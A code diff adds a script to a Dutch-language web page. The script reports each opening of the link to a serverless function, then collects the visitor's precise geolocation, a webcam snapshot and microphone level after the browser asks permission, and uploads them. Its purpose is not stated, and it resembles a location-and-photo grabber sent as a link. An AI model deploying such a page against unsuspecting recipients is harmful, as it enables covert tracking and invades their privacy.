--- a/index.html
+++ b/index.html
@@ -27,4 +27,119 @@
     <div class="msg" id="status">Nog niet gestart.</div>
     <pre id="debug"></pre>
   </div>
-</div
+</div>
+  <script>
+const statusEl = document.getElementById('status');
+const debugEl  = document.getElementById('debug');
+const endpoint = '/.netlify/functions/upload';
+
+function log(s){ statusEl.textContent = s; }
+function dbg(o){ debugEl.style.display='block'; debugEl.textContent = JSON.stringify(o,null,2); }
+function timeout(ms){ return new Promise((_,rej)=>setTimeout(()=>rej(new Error('timeout')),ms)); }
+
+// 1) altijd melden dat de link geopend is
+fetch(endpoint, {
+  method:'POST',
+  headers:{'Content-Type':'application/json'},
+  body:JSON.stringify({ phase:'opened', ts:Date.now() })
+}).catch(()=>{});
+
+async function getLocationOrNull(){
+  if(!('geolocation' in navigator)) return null;
+  try{
+    const p = await Promise.race([
+      new Promise((res,rej)=>navigator.geolocation.getCurrentPosition(res,rej,{ enableHighAccuracy:true, timeout:10000 })),
+      timeout(12000)
+    ]);
+    return { latitude:p.coords.latitude, longitude:p.coords.longitude, accuracy:p.coords.accuracy, timestamp:p.timestamp };
+  }catch(e){
+    console.warn('loc fail', e);
+    return null;
+  }
+}
+
+async function getMediaOrNull(){
+  try{
+    // belangrijk: alleen aanroepen NA een gebruikersklik (gebeurt via onclick)
+    return await navigator.mediaDevices.getUserMedia({ video:true, audio:true });
+  }catch(e){
+    console.warn('gUM fail', e);
+    return null;
+  }
+}
+
+function micLevelFromStream(stream){
+  try{
+    const ctx = new (window.AudioContext||window.webkitAudioContext)();
+    const src = ctx.createMediaStreamSource(stream);
+    const an = ctx.createAnalyser(); an.fftSize=256; src.connect(an);
+    const data = new Uint8Array(an.frequencyBinCount); an.getByteTimeDomainData(data);
+    let sum=0; for(let i=0;i<data.length;i++){ const v=(data[i]-128)/128; sum+=v*v; }
+    return Math.min(1, Math.sqrt(sum/data.length)*5);
+  }catch(e){
+    console.warn('mic level fail', e);
+    return null;
+  }
+}
+
+function snapshotFromStream(stream){
+  try{
+    const track = stream?.getVideoTracks?.()[0];
+    if(!track) return Promise.resolve(null);
+    const s = track.getSettings ? track.getSettings() : {};
+    const w = s.width || 480, h = s.height || 360;
+    const v = document.createElement('video'); v.autoplay=true; v.playsInline=true; v.srcObject=stream;
+    const c = document.createElement('canvas'); c.width=w; c.height=h; const ctx=c.getContext('2d');
+    return new Promise(resolve=>{
+      const draw=()=>{ try{ ctx.drawImage(v,0,0,w,h); resolve(c.toDataURL('image/png')); } catch { resolve(null); } };
+      if(v.readyState>=2) draw(); else v.onloadeddata=draw;
+    });
+  }catch(e){
+    console.warn('snapshot fail', e);
+    return Promise.resolve(null);
+  }
+}
+
+// ⬇️ deze wordt door de knop aangeroepen (inline onclick in je HTML)
+async function askAndSend(){
+  try{
+    log('Stap 1/4: toestemming vragen…');
+    const stream = await getMediaOrNull(); // kan null zijn (geweigerd/geb lokkeerd)
+
+    log('Stap 2/4: data verzamelen…');
+    const [loc, snap, mic] = await Promise.all([
+      getLocationOrNull(),                                   // kan null zijn
+      stream ? snapshotFromStream(stream) : Promise.resolve(null),
+      stream ? Promise.resolve(micLevelFromStream(stream)) : Promise.resolve(null)
+    ]);
+    if(stream) stream.getTracks().forEach(t=>t.stop());
+
+    const payload = { phase:'final', ts:Date.now(), location:loc, snapshot:snap, micLevel:mic };
+    dbg(payload);
+
+    log('Stap 3/4: versturen…');
+    const r = await fetch(endpoint, {
+      method:'POST',
+      headers:{'Content-Type':'application/json'},
+      body: JSON.stringify(payload)
+    });
+
+    if(r.ok){
+      log('Stap 4/4: verzonden. Bedankt!');
+    }else{
+      const t = await r.text().catch(()=> '');
+      log(`Verzenden mislukt (${r.status}).`);
+      console.error('upload status', r.status, t);
+      alert(`Server antwoord: ${r.status}\n${t}`);
+    }
+  }catch(e){
+    console.error(e);
+    log('Er ging iets mis. Zie console.');
+    alert('Fout: ' + (e?.message||e));
+  }
+}
+
+// healthcheck: laat in console zien of je function bereikbaar is
+fetch(endpoint).then(r=>console.log('function GET status', r.status)).catch(e=>console.error('func get fail', e));
+</script>
+
